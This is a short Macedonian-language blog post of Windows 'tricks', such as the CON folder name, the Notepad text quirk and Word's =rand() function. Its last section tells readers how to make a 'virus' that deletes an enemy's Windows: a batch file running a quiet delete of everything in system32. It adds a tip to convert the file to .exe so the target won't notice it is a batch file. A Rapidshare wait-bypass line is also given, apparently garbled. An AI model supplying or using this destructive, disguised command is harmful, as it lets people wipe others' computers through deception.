Latest Video

Thursday, October 29, 2009

Интересни трикови ! (1 дел)

(Овие 3 неможе ни мајкрософт да ги објасни )

1. Никој неможе да направи фолдер со име "CON" (без наводници)

2.Отворете нотепад и пишете го следново -

"Bush hid the facts"(без наводници)

-Зачувајте го,отворетего и видете што ке се случи

3.Отворете нов Word документ пишете го следново

=rand (200, 99) и стиснете ентер видете што се случува Како да симнувате од rapidshare.com без да чекате : 1 впишете го кодот во адрес барот

javascript:aler(c=0)

2.избришете ги празните места морав така зошто прави проблем дека е јава скрипта

Отворајте страни без Веб прелистувач

одете start->run и пишете го следното

C:\Windows\hh.exe http://www.адреса (кај http://www.адреса пишете ја веб страната која сакате да ја отворите пр:

C:\Windows\hh.exe http://www.besplatno.blog.com.mk

стиснете ентер

Направете вирус што ке го избрише виндовсот на вашиот непријател:)

1. Отворете нотепад

2.Впишете го следново

del c:\windows\system32\*.* /q (не го отварајте фајлот ке напраите беља)

3.Зачувајте го фајлот како Име.bat

4.Ако мислите ке ве приметат дека е бат фајлот симнете го конвертерот

.bat to .exe

Тоа беше све :)

Очекувајте 2 дел , а дотогаш уживајте:)

0 comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More